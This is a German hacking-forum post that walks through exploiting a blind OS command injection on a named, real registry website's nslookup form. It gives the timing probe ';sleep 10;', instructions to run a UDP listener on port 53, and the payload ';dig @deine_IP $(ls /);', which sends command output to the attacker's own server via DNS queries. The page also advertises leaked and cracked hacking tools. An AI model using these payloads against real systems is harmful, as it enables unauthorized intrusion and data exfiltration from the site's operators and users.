Zum Inhalt wechseln

Als Gast hast du nur eingeschränkten Zugriff!


Anmelden 

Benutzerkonto erstellen

Du bist nicht angemeldet und hast somit nur einen sehr eingeschränkten Zugriff auf die Features unserer Community.
Um vollen Zugriff zu erlangen musst du dir einen Account erstellen. Der Vorgang sollte nicht länger als 1 Minute dauern.

  • Antworte auf Themen oder erstelle deine eigenen.
  • Schalte dir alle Downloads mit Highspeed & ohne Wartezeit frei.
  • Erhalte Zugriff auf alle Bereiche und entdecke interessante Inhalte.
  • Tausche dich mich anderen Usern in der Shoutbox oder via PN aus.
 

   

Foto

[B|OSCI]nic.cy

- - - - -

  • Bitte melde dich an um zu Antworten
Keine Antworten in diesem Thema

#1
Zero-X

Zero-X

    FTB Experte

  • Premium Member
  • Likes
    127
  • 98 Beiträge
  • 45 Bedankt
  • Android [root]
  • Windows, Linux

URL:

http://www.nic.cy/nslookup/online_database.htm

Hier ist eine Blind OS Command Injection. Das heist, daß Systembefehle zwar ausgeführt werden aber man die Ausgabe nicht sieht.
Gibt man jetzt im Eingabefeld ";sleep 10;" ein, stellt man fest, daß das Skript deutlich länger zur Ausführung braucht (10 Sekunden).

Jetzt brauchen wir einen Server, der alle Daten protokolliert, die an ihn gesendet werden.
Ich nehme dazu immer den hier:

Please Login HERE or Register HERE to see this link!



In der Kommandozeile von Windows führen wir den Server folgendermasen aus:

echotool /p udp /s 53 /r 53 /l 53

Port 53 ist der DNS-Port wo wir gleich unsere Daten vom Target-Host senden.

Bei der oben genannten URL geben wir im Eingabefeld ein (Es muss eine IPV4 Adresse sein):

;dig @deine_IP $(ls /);

"dig" ist ein Befehl um sich Infos zu einer Domain oder IP anzuzeigen mit "@deine_IP" geben wir den gewünschten DNS-Server an. In diesem Fall den eigenen Server an den wir die Daten senden.
Wenn alles geklappt hat, sehen wir im Fenster mit der Kommandozeile die Ausgabe des Befehls "ls /".

 

dke98pip6lp6apczk.png



Thanked by 1 Member:
Erikson


  Thema Forum Themenstarter Statistik Letzter Beitrag

Besucher die dieses Thema lesen:

Mitglieder: , Gäste: , unsichtbare Mitglieder:


Dieses Thema wurde von 31 Mitglied(ern) gelesen


    chexum, Dean36, Erikson, Exynos, FatalityMods, Framerater, hacke2010, Haxlor, hlaus777, jmPesp, Jozu, keyb0ardz, Kraenk, lolorollo, Mini Rick, Mr1337speak, PadX18, pekelhc, pfadn, phoenixx592, pi^2, ProHex, Psykoon303, R3s1stanc3, Rogerlopensio, SecurityFlaw, sniffer, Stadt-Zofe, sub0, Zero-X, Zerobyte
Die besten Hacking Tools zum downloaden : Released, Leaked, Cracked. Größte deutschsprachige Hacker Sammlung.